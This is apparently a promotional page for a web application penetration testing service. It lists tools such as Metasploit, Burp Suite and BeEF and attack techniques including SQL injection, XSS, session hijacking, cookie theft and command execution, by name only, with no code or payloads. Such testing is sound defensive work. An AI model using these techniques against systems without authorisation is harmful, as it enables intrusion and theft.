Web application penetration testing

Cyber security is best layered and multi-level approach. Performing pen testing is a great way to ensure your security profile is vibrant and robust. You definitely will be able to save on penetration testing using online or automated tools but when you get compromised, would you be able to rationally defend your selection of pen testing service to your investors and clients?

A security analysis may scale from a simple scan of vulnerabilities, using industry standard tools, to a complete break in in a full blown penetration test. You’ll receive documentation with a complete listing of vulnerabilities and remediation steps accordingly to OWASP website penetration testing framework and guidelines.

Various tools and techics are being used:

Attack Webservers with Metasploit, Scan a Website for Vulnerabilities Using Acunetix and N-Stalker Vulnerability Scanner. Detect Phishing Using Netcraft. Sniff Network Traffic with Wireshark.Web application testing

    • Discover the infrastructure within the application
    • SSL configurations and weaknesses
    • Explore virtual hosting and its impact on testing
    • Learn methods to identify load balancers
    • Explore external information sources
    • Google hacking
    • Spider a Web site
    • Scripting to automate Web requests and spidering
    • Application flow charting
    • Relationship analysis within an application
    • JavaScript for the attacker
    • Vulnerability Discovery Overview
    • Creating Custom Scripts for Penetration Testing
    • Python for Penetration Testing
    • Web App Vulnerabilities and Manual Verification Techniques
    • Interception Proxies
    • Fiddler
    • OWASP Zed Attack Proxy
    • Burp Suite
    • Information Leakage & Directory Browsing
    • Username Harvesting
    • Directory Traversal
    • SQL Injection
    • Blind SQL Injection
    • Cross-Site Scripting (XSS)
    • Cross-Site Scripting Discovery
    • Cross-Site Request Forgery (CSRF)
    • Session Flaws
    • Session Fixation
    • Session hijacking (Hijack and Redirect Web Requests with the Zed Attack Proxy (ZAP))
    • AJAX
    • Logic Attacks
    • API Attacks
    • Data Binding Attacks
    • RatProxy
    • Automated Web Application Scanners
    • SkipFish
    • w3af
    • Explore methods to zombify browsers
    • Buffer overflow
    • BeEF
    • XSS-Proxy
    • Exploit the various vulnerabilities discovered
    • Exploit applications to steal cookies
    • Execute commands through Web application vulnerabilities